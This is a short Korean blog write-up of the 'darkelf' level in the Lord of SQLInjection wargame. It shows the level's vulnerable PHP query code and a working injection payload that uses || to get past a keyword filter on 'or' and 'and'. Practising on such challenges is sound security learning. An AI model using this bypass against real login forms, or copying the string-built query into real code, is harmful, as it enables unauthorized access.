darkelf

wargame 🏴‍☠️ write-up/Lord of SQLInjection

darkelf

Kortsec1 2022. 4. 2. 17:12

<?php 
  include "./config.php"; 
  login_chk(); 
  $db = dbconnect();  
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); 
  if(preg_match('/or|and/i', $_GET[pw])) exit("HeHe"); 
  $query = "select id from prob_darkelf where id='guest' and pw='{$_GET[pw]}'"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 
  if($result['id'] == 'admin') solve("darkelf"); 
  highlight_file(__FILE__); 
?>

or과 and를 추가로 필터링 한다.

||, &&로 바꾸어 우회해보자.

?pw=1'||id='admin

결과는 성공..!

'wargame 🏴‍☠️ write-up > Lord of SQLInjection' 카테고리의 다른 글

troll (0)	2022.04.02
orge (0)	2022.04.02
wolfman (0)	2022.04.02
orc (0)	2022.04.02

현재글darkelf

관계자외 출입 금지

h4cking game, expandAtFiles, James Kettle, 취약점, 실행 파일 형식, RCE, 2023 Top 10, PortSwigger, 대상 파일, 구문 분석, jenkins, CVE-2024-23897, web, Vulnerability, 어휘 분석, 중간 코드, ir code, PowerShell, SSTI, cl.cl,

Today :
Yesterday :

일	월	화	수	목	금	토
			1	2	3	4
5	6	7	8	9	10	11
12	13	14	15	16	17	18
19	20	21	22	23	24	25
26	27	28	29	30	31

보안

darkelf

'wargame 🏴‍☠️ write-up > Lord of SQLInjection' 카테고리의 다른 글

'wargame 🏴‍☠️ write-up/Lord of SQLInjection'의 다른글

티스토리툴바

darkelf

'wargame 🏴‍☠️ write-up > Lord of SQLInjection' 카테고리의 다른 글

'wargame 🏴‍☠️ write-up/Lord of SQLInjection'의 다른글

관련글

티스토리툴바